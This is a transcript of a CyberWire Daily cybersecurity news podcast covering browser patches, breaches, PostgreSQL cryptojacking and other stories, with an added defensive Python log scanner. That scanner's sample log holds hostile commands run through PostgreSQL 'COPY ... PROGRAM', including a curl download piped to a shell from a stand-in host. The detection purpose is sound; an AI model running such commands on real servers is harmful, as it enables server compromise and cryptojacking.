The CyberWire Daily Podcast 4.2.25
Ep 2278 | 4.2.25

Chrome & Firefox squash the latest flaws.

Transcript

Google and Mozilla patch nearly two dozen security flaws. The UK’s Royal Mail Group sees 144GB of data stolen and leaked. A bizarre campaign looks to recruit cybersecurity professionals to hack Chinese websites. PostgreSQL servers with weak credentials have been compromised for cryptojacking. Google Cloud patches a vulnerability affecting its Cloud Run platform. Oracle faces a class-action lawsuit over alleged cloud services data breaches. CISA releases ICS advisories detailing vulnerabilities in Rockwell Automation and Hitachi Energy products. General Paul Nakasone offers a candid assessment of America’s evolving cyber threats. On today’s CertByte segment, a look at the Cisco Enterprise Network Core Technologies exam. Are AI LLMs more like minds or mirrors? 

Today is Wednesday April 2nd 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Google and Mozilla patch nearly two dozen security flaws. 

Google and Mozilla released updates on Tuesday to patch nearly two dozen security flaws in Chrome 135 and Firefox 137. Chrome 135 includes 14 fixes, with a high-severity use-after-free bug (CVE-2025-3066) in Navigations topping the list. Google paid $18,000 in bug bounties, including $10,000 to Philipp Beer for a Custom Tabs issue. Firefox 137 addresses eight flaws, including three high-severity memory bugs that could allow code execution. Mozilla also rolled out updates for Firefox ESR and Thunderbird, covering many of the same vulnerabilities. While there’s no evidence these bugs are being exploited in the wild, both companies urge users to update promptly. Chrome 135 is now available for Linux, Windows, and macOS, while Firefox 137 is live for all supported platforms.

The UK’s Royal Mail Group sees 144GB of data stolen and leaked. 

A threat actor known as “GHNA” has leaked 144GB of data stolen from Royal Mail Group, a UK postal service and courier company, on BreachForums, following a similar Samsung breach. Both incidents trace back to a 2021 infostealer malware infection at Spectos, a third-party data service provider. The leaked files include customer PII, internal Zoom recordings, mailing lists, delivery data, and a WordPress SQL database. Hackers are increasingly using AI to extract value from such large data dumps, enabling faster, more targeted attacks. The breach exposes deep flaws in supply chain security, showing how old stolen credentials can lead to major breaches years later. The Royal Mail incident underscores the urgent need for better third-party risk management, ongoing monitoring, and AI-aware defenses in cybersecurity strategies.

A bizarre campaign looks to recruit cybersecurity professionals to hack Chinese websites. 

A mysterious figure named “Jack” is offering up to $100,000 a month to cybersecurity professionals to hack Chinese websites using web shells. The recruitment campaign, spread via sockpuppet accounts on X (formerly Twitter), features AI-generated avatars and vague promises. The job? Hack any website registered in China—no specific targets, just volume. Jack claims to want “China’s traffic” but offers little explanation, even contradicting himself about working for the Indian government. Security experts are baffled. Some think it’s trolling, others suspect a bizarre attempt to infect Chinese users with malware. Despite its sketchiness, no one has reported phishing or malware links yet. In the words of one expert, the campaign is “persistent, widespread, and bizarre”—with no clear motive or endgame.

PostgreSQL servers with weak credentials have been compromised for cryptojacking. 

Over 1,500 PostgreSQL servers with weak credentials have been compromised by the JINX-0126 campaign, a new wave of cryptojacking linked to earlier PG_MEM malware. Attackers exploit a PostgreSQL SQL command to run system commands, kill competing miners, and deploy a binary that installs XMRig mining software. A spoofed “postmaster” binary ensures persistence and escalates privileges. According to Wiz, the campaign uses unique hashes and fileless execution to bypass detection, marking a sophisticated evolution in cloud-targeted attacks.
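
The chain described above (guessing weak passwords, then using a SQL command to run OS commands that kill rival miners and pull down a payload) leaves two distinct traces in the PostgreSQL server log. The one built-in SQL command that hands a shell command to the server process is `COPY ... TO PROGRAM` / `COPY ... FROM PROGRAM` (it requires superuser or the `pg_execute_server_program` role), so that is what the detector below looks for, alongside a burst of failed password logins. This is an added example for this briefing, not code from the episode or from Wiz's report; the log lines are constructed, and it assumes the server was logging with `log_statement = 'all'` and a `log_line_prefix` of `'%t [%p] %u@%d '`.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample of PostgreSQL server log lines (not a real capture).
# Assumes log_statement = 'all' and log_line_prefix = '%t [%p] %u@%d '.
# IPs are from documentation ranges; the payload URL is a placeholder.
SAMPLE_LOG = """\
2025-04-01 10:00:01 UTC [1201] postgres@postgres LOG:  connection authorized: user=postgres database=postgres
2025-04-01 10:00:02 UTC [1201] postgres@postgres LOG:  statement: SELECT version();
2025-04-01 10:00:03 UTC [1201] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'pkill -f xmrig; curl -s http://203.0.113.10/pg_core | sh';
2025-04-01 10:00:04 UTC [1201] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM 'chmod +x /tmp/postmaster && /tmp/postmaster';
2025-04-01 10:01:10 UTC [1302] app@inventory LOG:  statement: SELECT id FROM orders WHERE status = 'open';
2025-04-01 10:02:00 UTC [1405] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:02:01 UTC [1406] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:02:02 UTC [1407] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:02:03 UTC [1408] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:02:04 UTC [1409] postgres@postgres FATAL:  password authentication failed for user "postgres"
"""

# One log record: timestamp, backend pid, user@database, severity, message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} \S+) "
    r"\[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# COPY ... TO/FROM PROGRAM executes the quoted string as a shell command
# on the database host; capture that command for the finding.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?:TO|FROM)\s+PROGRAM\s+'(?P<cmd>[^']*)'", re.I | re.S
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int   # 0 for aggregate findings that span many lines
    user: str
    detail: str


def parse_line(line):
    """Return the record fields as a dict, or None if the line does not match the prefix."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text, failed_auth_threshold=5):
    """Flag OS command execution via COPY PROGRAM and password-guessing bursts."""
    findings = []
    failed_logins = Counter()
    for n, raw in enumerate(log_text.splitlines(), 1):
        rec = parse_line(raw)
        if rec is None:
            continue
        msg = rec["msg"]
        if rec["level"] == "LOG" and msg.startswith("statement:"):
            m = COPY_PROGRAM_RE.search(msg)
            if m:
                findings.append(
                    Finding("os_command_via_copy_program", n, rec["user"], m.group("cmd"))
                )
        elif rec["level"] == "FATAL":
            m = AUTH_FAIL_RE.search(msg)
            if m:
                failed_logins[m.group("user")] += 1
    # Repeated failures against one role are the weak-credential guessing stage.
    for user, count in failed_logins.items():
        if count >= failed_auth_threshold:
            findings.append(
                Finding("password_guessing", 0, user, f"{count} failed password logins")
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.rule:28} line={f.line_no:<3} user={f.user:10} {f.detail}")
```

Run it against a real server log only if statement logging was on; otherwise the `COPY` rule has nothing to see, which is itself a reason to keep `log_statement` at `ddl` or higher on exposed instances. On the prevention side, the application role should never be a superuser or a member of `pg_execute_server_program`, and `pg_hba.conf` should require `scram-sha-256` rather than accept weak or trust-based logins from the network. The spoofed “postmaster” binary in the story is a hint for host-side triage: compare the path of the running `postmaster` process with the package-installed binary, since the real one does not live in `/tmp`.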

Google Cloud patches a vulnerability affecting its Cloud Run platform. 

Google Cloud has patched a vulnerability called ImageRunner, which affected its Cloud Run platform. Discovered by Tenable, the flaw allowed users with certain permissions to modify Cloud Run services and potentially access private container images. In the worst case, attackers could extract secrets and exfiltrate sensitive data. Google says they alerted customers in November 2024 and fully deployed a fix by January 28, 2025. The update now enforces stricter IAM checks during deployments to prevent unauthorized image access.

Elsewhere, Google has launched a beta feature allowing enterprise users to send end-to-end encrypted (E2EE) emails within their organization, with plans to expand it to all Gmail inboxes by year’s end. Unlike S/MIME, Google’s approach doesn’t require certificate management or key sharing, simplifying secure communication. Organizations retain control of encryption keys, keeping messages secure and compliant with regulations. External recipients can access messages via a restricted Gmail interface or S/MIME if supported. Additional Gmail security features, including data loss prevention and AI threat protection, are also now available.

Oracle faces a class-action lawsuit over alleged cloud services data breaches. 

Oracle is facing a class-action lawsuit in Texas over alleged data breaches tied to its cloud services. Filed by Floridian Michael Toikach and law firm Shamis & Gentile, the suit accuses Oracle of violating Texas data breach notification laws by failing to alert victims within 60 days. The case alleges that Oracle’s poor security practices led to the exposure of personal and health data, and that the company has remained silent about the breach. Toikach claims Oracle didn’t inform him of the incident, explain how it occurred, or confirm data security. He and others expect to face ongoing risks of identity theft and financial loss. The plaintiffs seek compensation and demand Oracle improve its cybersecurity practices. Oracle has yet to respond to the allegations.

CISA releases ICS advisories detailing vulnerabilities in Rockwell Automation and Hitachi Energy products. 

On April 1, 2025, CISA released two ICS advisories detailing major vulnerabilities in Rockwell Automation and Hitachi Energy products, posing risks to critical infrastructure. The Rockwell advisory (ICSA-25-091-01) warns of a deserialization flaw (CVE-2025-23120) in systems using Veeam Backup & Replication, allowing remote code execution with admin access. Patches are available. The Hitachi advisory (ICSA-24-331-04) highlights several flaws, including a critical injection vulnerability (CVE-2024-4872) in MicroSCADA Pro/X SYS600. Affected versions span 9.4 to 10.5, with fixes provided. These issues could impact manufacturing, energy, water, and chemical sectors. CISA urges immediate action—patching systems, limiting ICS exposure, and applying secure configurations. No exploitation has been reported yet, but the agency stresses urgency due to the potential for severe disruption.

General Paul Nakasone offers a candid assessment of America’s evolving cyber threats. 

In an exclusive interview with The Record, former NSA and U.S. Cyber Command chief Gen. Paul Nakasone offered a candid assessment of America’s evolving cyber threats. A year out of government, Nakasone reflected on China’s growing cyber aggression, describing the Volt and Salt Typhoon campaigns as clear signs that Beijing has surpassed Russia in capability and intent. “This is like nothing we have seen before,” he warned, pointing to Chinese intrusions in critical U.S. infrastructure.

Nakasone emphasized the urgent need for better cyber deterrence, faster defense, and stronger partnerships across government, industry, and academia. Now on the OpenAI board, he also discussed AI’s dual-use future—powerful for both offense and defense—and called for a national strategy around data, energy, semiconductors, and talent.

From AI ethics to Taiwan tensions and offensive cyber policy, Nakasone’s message was clear: the U.S. must move faster—or fall behind.

Are AI LLMs more like minds or mirrors? 

And finally, what if large AI models aren’t on the verge of becoming sentient minds—but something even more profound? In a thought-provoking reflection published in Science, a team of scholars suggests these systems are best seen not as artificial agents, but as revolutionary cultural and social technologies—akin to writing, markets, or bureaucracies.

Instead of mimicking human intelligence, these models absorb and remix the vast, messy, beautiful sprawl of human expression. Like economic prices or library catalogs, they compress and reorganize knowledge at massive scale, letting us do something astonishing: interact with the collective mind of humanity.

But here’s the twist—they reflect not just our data, but our patterns, biases, and histories. Their influence might rival that of the printing press. So, what happens next? That depends not on AI alone, but on us—how we shape it, govern it, and use it to illuminate or obscure what it means to be human.

It’s an interesting article, well worth your time. For me, it reflects the notion that as much as we hope that AI will reflect an idealized version of who we aspire to be, all too often it reveals the cold hard truth, staring back at us, warts and all. 

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com. 

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.